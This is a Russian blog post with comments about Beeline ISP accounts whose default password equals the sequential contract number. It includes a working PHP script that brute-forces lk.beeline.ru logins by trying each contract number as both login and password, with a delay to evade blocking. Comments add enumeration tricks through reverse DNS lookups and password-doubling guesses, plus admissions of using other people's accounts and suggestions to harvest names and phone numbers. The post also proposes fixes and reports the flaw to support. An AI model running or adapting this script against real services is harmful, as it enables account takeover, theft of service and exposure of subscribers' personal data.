Я уже как-то писал о простых паролях, простом «шифровании» и к чему это приводит. Но это цветочки по сравнению с безопасностью в Билайне. При переезде на новую квартиру подключил Интернет от Билайн. Пришел мастер, кинул витую пару, отдал копию договора – всё как обычно. Но есть одна интересная особенность: по умолчанию логин и пароль совпадают с номером договора.
Пользователь может самостоятельно сменить пароль, но может и не менять. Как показывает практика, 30% пользователей не меняют пароль. Это же так удобно, когда пароль совпадает с логином.
Таким образом, если у вас есть Интернет от Билайна (проведен кабель в квартиру), то вы можете подключиться к чужому Интернету, просто перебрав 5-20 вариантов логин-пароль.
Стандартное окно подключения
Подключаемся к Интернету, используя номер договора в качестве логина и пароля. Тут, правда, может получиться так, что пароль совпадает, но пользователь уже подключен к Интернету в данный момент и вы не сможете сидеть параллельно с ним. Или пароль совпадает, но денег на аккаунте нет, то подключиться к Интернету не получится. В этом случае вылезает ошибка 691. Кстати, если же вы подключились к чужому Интернету, то владелец при подключении увидит ту же ошибку.
30% паролей совпадают с номером договора. Например, 25 номеров, идущих подряд. Зеленым отмечены совпадения.
Кстати, по этим же номерам можно зайти в Личный кабинет Билайна. А там есть личные данные пользователя.
Простой php-скрипт нахождения совпадений логин-пароль (хостинг должен поддерживать SSL).
<?php
// хостинг должен поддерживать SSL-соединение
$prefix = '089';
$start = 489****; // вместо звездочек подставить цифры
$end = 489****; // вместо звездочек подставить цифры
$array = array();
for ($i = $start; $i<$end; $i++) {
$dogovor = $prefix.$i;
// обращение к странице логина для взятия куки
$sock = fsockopen("ssl://lk.beeline.ru", 443, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fputs($sock, "GET / HTTP/1.0\r\n");
fputs($sock, "Host: lk.beeline.ru\r\n");
fputs($sock, "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1)\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "Content-Type: application/x-www-form-urlencoded\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 4096))) {
$headers .= "$str\n";
}
fclose($sock);
preg_match_all("/Set-Cookie: (.+)(;|\r)/iUs", $headers, $cook);
$cookie = implode('; ',array_unique($cook[1]));
// POST-запрос с логином и паролем
$sock = fsockopen("ssl://lk.beeline.ru", 443, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = 'login='.$dogovor.'&password='.$dogovor.'&check=1';
fputs($sock, "POST / HTTP/1.0\r\n");
fputs($sock, "Host: lk.beeline.ru\r\n");
fputs($sock, "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1)\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "Cookie: ".$cookie."\r\n");
fputs($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-Length: ".strlen($data)."\r\n\r\n");
fputs($sock, $data."\r\n");
$headers = "";
while ($str = trim(fgets($sock, 4096))) {
$headers .= "$str\n";
}
fclose($sock);
$correct = 0;
if (strpos($headers,'Location: http://lk.beeline.ru/news/') !== false) {
$correct = 1;
}
$array[] = array('dogovor'=>$dogovor,'correct' => $correct);
sleep(1); // задержка на 1 секунду для защиты от блокировок со стороны Билайна
}
print_r($array);
?>
Кто виноват?
Разумеется виноваты технари Билайна, так как отдавать пользователям на откуп их же безопасность не правильно. Одно дело, когда сервис допускает возможность ввести простой пароль, а другое дело, когда все логины известны (нумерация договоров идет по порядку) и пароли совпадают с ними. К сожалению, технически грамотных пользователей крайне мало.
Что делать?
- Сменить пароли всем абонентам, у которых пароль совпадает с номером договора. Выслать на почту или по SMS новый пароль.
- При активации Интернета обязывать пользователя вводить новый пароль, который не может совпадать с номером договора (например, как это сделано в личном кабинете МГТС).
P.S. отписал в техподдержку
Занятно))
Скрипт жутковат правда. Например при первом запросе не нужно посылать
"Content-Type: application/x-www-form-urlencoded"
да, взял пример работы с сокетами с какого-то сайта.
А проверка по мак адресу модема/роутера в билайне не предусмотрена? У нас в киргизии все провайдеры этим пользуються. Поэтому если только ты кулцхакер, и можешь прописать в свой модем такой же мак адрес тогда конечно всё получиться.
автотр козел спалил такую дыру, юзаю ее уже пол года !!!
Сергей, как же бесят такие зануды.
Помогите, инет через пол часа отрубят за неуплату, так и не нашёл куда бы вошло ;D
и что? этой фиче в билайне куча лет. всех устраивает.
Если вы параноик то ставьте 16знаковый пароль.
Я работаю в техподдержке Билайне. Понимаете, домохазяке строго пох, какой у нее пароль, за частую она даже не помнит, что он есть. Главное - что заходит. Проснется она только тогда, когда у нее будет 691 по причине того, что кто-то юзает ее интернет. Где-то года 1.5 назад если была зафиксирована смена портов на свитче у логина - блокировали порт воришке, чтобы звонил и просил разблокировать. Теперь нам запретили это делать. Бывают недобросовестные монтажники, которые юзают чужой интернет, встречал пару раз.
Предлагаю заморочиться скриптом, который кроме всего прочего собирает базу ФИО+мобильный, актуально для тех, кто промышляет СМС-рассылкой, а для конкунертов Билайн - клондайк)
А мне позавчера уже звонили из МГТС и предлагали Интернет за 10 руб в день + бесплатный wifi-роутер.
ВОт это засада :)
Еще один валун в улей желто-африканских существ.
Тот аргумент, что запрещено отлавливать нарушителей встречается повсеместно, пока не сопрут учетку у директора. А вот за недостаточные меры по защите информации от НСД,а именно политика паролей, можно прилично получить по щам от ФСТЭК. намекните руководству, с 1 июля, в противном случае, будет жарко.
А у нас в Ярославле ставят всем 8 нулей при подключении. На вопрос "а можно я нормальный пароль сразу введу?" ответили так: "введете как-нибудь потом, а вначале нужно обязательно такой ставить".
Шмель, вы правы.Однажды в отделе, года два назад, убили учетку (случайно) главы департамента нашего. На следующей день нам такую возможность запилили :) так что... пока не пнешь - не полетит. Не дадут пинка свыше, никто даже заморачиваться не будет. Вообще, при первичном подключении пароль нужно придумывать самому, но теже домохозяйки особо не заморачиваются и "доверяют" это работу монтажникам :)
:)
Я работаю монтажником в Билайне. Как раз тем парнем, который "кинул витую пару, дал договор и ушёл".
На самом деле вы зря панику раздули. Всё намного проще.
Когда вы создаёте заявку на подключение, вам присваивают логин(совпадает с номером лицевого счёта) и временный(!!!) пароль. Временный пароль для подключения не годен. Он нужен чтобы первый раз авторизоваться в личном кабинете(lk.beeline.ru) и сменить его на постоянный пароль(по идее, согласно регламенту, монтажник должен спросить у клиента, какой пароль он хочет себе поставить, посоветовать ему добавить в пароль цифры, буквы разного регистра и желательно спецсимволы. Также категорически(!) запрещается ставить абоненту пароль вида qwerty, 12345 или совпадающий с логином).
НО! У монтажников оплата сдельная(чем больше людей подключил, тем больше заплатили). Так что сидеть и два дня обьяснять абоненту, что такое брутфорс и криптостойкость не очень то хочется. Так что как правило в качестве пароля выступают: qwerty, 12345 или логин :)
Лично я потом вкратце говорю абоненту, где он может поменять пароль и зачем это нужно. Ну это всё от человека зависит.
Хм у меня года 4 корбина(билайн). Припоминаю при подключении по телефону логин оператору диктовал придуманный, так что логин с паролем не совпадали изначально.
Спалю, монтажник, который проводил нам интернет, выставлял пароль 123456789. И наверняка, у многих подобные пароли остались, можно добавить в проверку наверное)
nazargulov.com - здесь все логины из подсети 93.81.238.0/24. Там только пользователи, заказавшие реальный IP. Всего у меня около 1,5 тысяч таких логинов с привязкой к адресу для 17 подсетей. Откуда это? Введите в своей любимой ОС команду "nslookup 93.81.238.1" и все поймете. Оставалось лишь написать небольшой скрипт для парсинга DNS.
Так что да, с безопасностью у них все очень весело. Но я лично с тех пор перешел на NBN.
По умолчанию абоненту выдают временный пароль, с которым подключится к сети невозможно. А далее абонент меняет пароль на какой-либо через личный кабинет. Недальновидность пользователя - проблема пользователя
По-умолчанию монтажнику дают вместе с нарядом бумажку с временным паролем, который 1) отличается от логина 2) единственное, что с ним можно сделать - сменить. То что эффективный пароль совпадает с логином - проделки монтажников. Подрядчикам-монтажникам яйцы оторвать надо.
Ради интереса посмотрел договор. Пароль: 123456789, написанный монтажником :)
Я домохозяйка! Задолбали!
Вы (монтажник, слесарь, электрик и т.д.) ко мне в дом приходите, вы специалист? Так сделайте так, что бы работало качественно и безопасно! Разве это не минимальные требования?
Нахера ты все это рассказал? Прикроют дырку...
Удачи в использовании.
Только не забудь подготовить теплые вещи, перед тем, как за тобой придут.
Ага, полосатые вещи :)
Интересно, а если сменить исходный пароль на исходный, система отреагирует или покорно заработает с временным паролем ?
была наприятная история со сменой пароля на свежем аккаунте, конгда монтажник настаивал на немедленной смене со стандартного на другой пароль, а $ на счете еще было целых 0 рублей. В результате блокировка и минимум за месяц вперед платить, хотя в те времена еще можно было внети половину от ежемесячной аб.платы, и пользоваться. Расчет то был ежесуточный, а не ежемесячеый.
Контролируются одновременные входы с разных адресов,
Давайте спалю кантору еще сильнее =)
А если не подходит пароль совпадающий с логином тогда просто удваивается последняя цифра =)
Ведь как и говорят с логином и паролем совпадающим с логином войти в сеть нельзя, а теперь попробуйте почекайте с двойной последней цифрой пароля =)
инфа 100%
ту ШмельНа сколько мне известно то пароль надо менять не сразу а только после внесения денег на счет, монтажники вроде предупреждают об этом.
(квоте)
Контролируются одновременные входы с разных адресов,(/квоте) - это факт как и то что со своим или чужим логином-паролем можно подключиться с любого билайн кабеля.
В моей канторе уже были случаи таких умников благо по мак адресу легко отслеживаются. Да и подмена мака быстро всплывает.
2Сырно. Пользователи - главная дыра безопасности любой системы, а пров который не борется с дырками в своей системе удивляет ;-)
У нас на Украине такая же хрень, только с Киевстаром))
Я подключался 2 дня назад. При подключении пароль совпадал с логином. После регистрации оборудования мастер попросил поменять пароль, что я и сделал.
Подключал билайн месяца 3 назад. В заказе-наряде прописан логин и пароль (временный). Пароль временный состоял из 10 английских символов разного регистра. Но! Он был аккуратно зачеркнут, а от строчки с логином шла стрелка к зачеркнутой строчке и приписано ручкой "этот же". Зачем так сделали - непонятно. Для простоты, видимо. Но сразу же после ухода монтажника я изменил пароль на нормальный
Подключился 4 месяца назад и всё это время пользовался паролем, который указал монтажник - "123456".
Монтажник ни слова не сказал, что его надо менять. И в голову не могло прийти, что никак не контролируется, с какого компьютера вход.
Проще в договоре красными буквами описать "процедуру"смены
пароля.
Дырка с реальныйм айпи не всегда работае)) проверил на своем и соседних айпишниках) инфа закрыта, сервер не реагрирует на лукап)
а то что не меняют пароли проблема пользователей, и провайдера волновать не должны, хотя по умолчанию(с возможностью отключения) был бы только за установку запрета использования логина с разных пк, первый вход- зафиксировать, надо переместется - отвязывать через тп.
C:\>nslookup 85.21.xxx.xxx
Server: hdns1.corbina.net
Address: 213.234.xxx.xx
я и мои друзья пользуются несколькими логинами с разными тарифами по разным адресам, считаю это очень удобным(потому и на билайне) следовательно, я против контроля за мной. чужими без спроса не пользуюсь и другим свои пароли не дам (у всех друзей пароли достаточно сложные). проблема с воровством решается обращением абонента в сп о том что не может выйти в нет по неизвестной причине и выяснением оператором причины с дальнейшими последствиями для нарушителя. если абонент не замечает использование его инета другими - то ничего страшного, благо инет нынче анлим, а про изменение паролей оператор известить должен, через сп или в договоре написать...
КАК ЗАХОДИТЬ В ИНТЕРНЕТ БИЛАЙН НЕ ИСПОЛЬЗУЯ ПАРОЛЬ
КАК ЗАХОДИТЬ В ИНТЕРНЕТ ОТ БИЛАЙН НЕ ИСПОЛЬЗУЯ ПАРОЛЬ
Что за ху.. вы тут несёте !) Пароль совпадает с логином только по одной причине весь из себя требовательный подключенец придумает вменяемый пароль пройдёт месяц а у монтажника есть ещё и другие заявки... Так что пароль выставляется дублем только для активации абонента, в дальнейшем это головная боль пользователя насколько хитро ему зашифровать доступ !)
Либо не нойте от того что долго ждали монтажника, войдите в его ситуацию и поймите, что всё это время ему насиловал мозг такой же мудозвонище с притензией на собственную значимость и невъебенность.)
билайн у меня вай фай -_- и так получилось что соседи узнали пароль от него... все что я могу - поменять пароль от личного кабинета, но блин, поменять пароль к сети не выходит уже 3 дня. скажите как это делать пожаааалуйста
Сегодня пытался добиться ПОДРОБНОЙ инструкции по смене временного пароля от Евгения на чате Билайн-не получил
Как пользоваться скриптом? Расскажите пожалуйста, я никогда с этим не сталкивался, всегда вручную подбирал эти пароли и записывал результат
надо в личный кабинет срочно зайти набираю *110*9# и не ответа ни привета не на один номер.......как по другому пароль в личном кабинете поменять
Никак не могу зайти в личный кабинет. Три раза менял на временные пароли, т.к. свой пароль оказался не верный. И все равно не принимает и временные пароли. Что за хрень?